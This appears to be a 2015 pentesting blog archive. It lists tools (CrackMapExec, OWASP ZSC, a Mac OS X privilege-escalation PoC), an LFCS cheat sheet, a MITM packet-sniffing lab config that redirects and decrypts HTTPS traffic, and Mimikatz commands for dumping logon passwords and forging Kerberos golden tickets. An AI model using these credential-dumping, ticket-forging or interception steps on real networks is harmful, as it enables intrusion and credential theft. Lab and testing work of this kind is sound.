Aug 21, 2015

Tools: CrackMapExec - pentesting Windows/Active Directory tool

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!
The biggest improvements over the above tools are:
  • Pure Python script, no external tools required
  • Fully concurrent threading
  • Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
  • Opsec safe (no binaries are uploaded to dump clear-text credentials)
Requires the impacket, gevent and netaddr Python libraries

Source:: https://github.com/byt3bl33d3r/CrackMapExec

Tools: BinNavi - binary analysis IDE

BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts.

Source:: https://github.com/google/binnavi

CheatSheet: LFCS (Linux Foundation Certified System Admin)


Command-line Detail Command
Command-line Editing text files on the command line vim, nano

Editing text files on the command line cat, grep, tr, cut, awk, head, tail, echo
Filesystem & storage Archiving and compressing files and directories tar,gzip,xz,gunzip,bz2

Assembling partitions as LVM devices pvcreate,vgcreate,lvcreate,lvextend

Configuring swap partitions mkswap, swapon, swapoff

File attributes chmod, chattr, chown

Finding files on the filesystem find, grep

Formatting filesystems mkfs series

Mounting filesystems automatically at boot time /etc/fstab

Mounting networked filesystems mount in /etc/fstab and package of nfs-client

Partitioning storage devices fdisk

Troubleshooting filesystem issues fsck
Local system administration Creating backups cp, rsync

Creating local user groups useradd, adduser, groupadd, addgroup

Managing file permissions chmod, chattr, chown

Managing fstab entries /etc/fstab

Managing local users accounts usermod, passwd

Managing the startup process and related services /etc/rc.local, /etc/rc*.d

Managing user accounts usermod, passwd

Managing user account attributes usermod, passwd

Managing user processes /etc/security/limits.conf, ulimit

Restoring backed up data tar,gzip,xz,gunzip,bz2

Setting file permissions and ownership chmod, chattr, chown
Local Security Accessing the root account su, sudo

Using sudo to manage access to the root account sudo
Shell scripting Basic bash shell scripting if,else, expr, while, for,${#string},${name:0:n:},$0,$1,$2,$#,$*
Software management Installing software packages apt-get, dpkg, rpm, yum

Tools: Whonix - Anonymous OS

Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP.
Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Source:: https://www.whonix.org/wiki/Main_Page

Aug 18, 2015

Howto: Setup MiTM lab on wifi network By Hackers Online Club

Source:: http://blog.hackersonlineclub.com/2015/08/snifflab-setup-your-own-mitm-packet.html

Setting up a SNIFFLAB
Scripts to create your own MITM'ing, packet sniffing WiFi access point.

Firewall rules on DD-WRT router to send traffic to MITM proxy box

Make sure the network interface (vlan1 here) is correct.

PROXYIP=your.proxy.ip
iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
ip rule add fwmark 3 table 2
ip route add default via $PROXYIP dev vlan1 table 2

PCAP machine scripts

/etc/network/interfaces

auto lo
iface lo inet loopback
iface eth0 inet manual
iface eth1 inet manual
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

auto bond0
iface bond0 inet dhcp
bond-mode 3
bond-miimon 100
slaves eth0 eth1
/etc/wpa_supplicant/wpa_supplicant.conf

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
ssid=""
psk=hashofyourpassword
proto=RSN
key_mgmt=WPA-PSK
pairwise=TKIP
auth_alg=OPEN
}

Getting the network running correctly on boot

/etc/init.d/network.sh

#!/bin/sh
### BEGIN INIT INFO
# Provides: network.sh
# Short-Description: Ensure WiFi as well as Ethernet interfaces are up
# Description:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
### END INIT INFO
sudo ifplugd eth0 --kill
sudo ifup wlan0
sudo ifup eth0
sudo ifup eth1
sudo ifconfig eth1 promisc
sudo ifconfig eth0 promisc
exit 0

Start capturing packets on startup -- create a sniffer service

/etc/init/sniffer.conf

#sniffer.conf
start on runlevel [2345]
stop on runlevel [016]

script
cd /home/pi/snifflab
exec python sniffer.py -i bond0 -s 100 -t 1200
end script

MITM proxy service

mitm.conf

start on filesystem

script
sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
SSLKEYLOGFILE=/var/log/mitmkeys.log
export SSLKEYLOGFILE
echo "MITM Keys being logged here: $SSLKEYLOGFILE"
exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
end script

Script to backup pcaps to local machine

#!/bin/bash
remote_server=yourservername
pcap_dir=/pcaps
keylogfile=/var/log/mitmkeys.log
local_dir=~/Documents/snifflab

rsync -a "$remote_server":$pcap_dir $local_dir
scp "$remote_server":$keylogfile $local_dir

Tools: OWASP ZCR Shellcoder

OWASP ZCR Shellcoder is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Source: https://github.com/Ali-Razmjoo/OWASP-ZSC/

Aug 16, 2015

Tools: Exploit Privilege Escalation in Mac OS X 10.10.5

xnu local privilege escalation via cve-2015-???? & cve-2015-???? for 10.10.5, 0day at the time | poc||gtfo

Source:: https://github.com/kpwn/tpwn

Howto: Install Java on Kali 2.0

1. Download java from http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html

2. Unzip it
tar xzvf jdk-8u51-linux-x64.tar.gz


3. Move it to /opt
mv jdk1.8.0_51/ /opt/

4. Install the new path of java
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_51/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_51/bin/javac 1
update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.8.0_51/jre/lib/amd64/libnpjp2.so 1

Howto: Using Mimikatz on Windows 8.1 by Carnal0wnage

Source::
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden
http://carnal0wnage.attackresearch.com/2015/02/msfs-mimikatz-doesnt-work-on-windows-81.html

1. mimikatz # sekurlsa::logonpasswords
2. Dump Kerberos Ticket
mimikatz # sekurlsa::tickets /export
3. Get ticket current session
mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

4. Create Kerberos Ticket
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

mimikatz # kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080

Howto: Fix and use Armitage in Kali2

Source:: https://samsclass.info/123/proj10/armitage-kali2.htm

curl http://www.fastandeasyhacking.com/download/armitage150813.tgz > armitage150813.tgz
tar xzf armitage150813.tgz
cd armitage
msfdb init 
./armitage